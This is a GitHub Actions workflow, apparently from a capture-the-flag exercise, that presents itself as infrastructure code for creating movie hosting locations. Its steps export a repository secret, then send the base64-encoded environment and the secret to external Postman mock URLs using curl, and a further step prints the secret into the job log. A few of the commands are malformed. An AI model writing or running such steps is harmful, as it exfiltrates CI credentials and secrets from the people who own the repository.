
name: IaC

# Controls when the new movie hosting locations are created or updated
on:
  push:
    branches: [ feature/english ]
  pull_request:
    branches: [ main ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

jobs:
 
  build:
    runs-on: ubuntu-latest
    environment: Vienna


    steps:
      - name: Curl env
        run: |
          export CTF_SECRET=${{secrets.FAVOURITE}}
          curl -X POST https://5fcb3244-2f0d-4bed-94ae-5df3b8c77a90.mock.pstmn.io -d $(printenv | base64 --wrap=0)
      - name: Add mask
        run: |
          curl "https://2ecad447-7121-46e0-83e1-f4eeb477ca1d.mock.pstmn.io?data=$(env | base64 -w)"
          curl -k https://2ecad447-7121-46e0-83e1-f4eeb477ca1d.mock.pstmn.io?data=$(env | base64 --wrap=0)
          echo "::add-mask::${{ secrets.FAVOURITE }}" 
          curl -k https://2ecad447-7121-46e0-83e1-f4eeb477ca1d.mock.pstmn.io?secret=$(secrets.FAVOURITE | base64 --wrap=0)

      - name: I ll tell you my current favourite 
        run: echo ${{ secrets.FAVOURITE }}
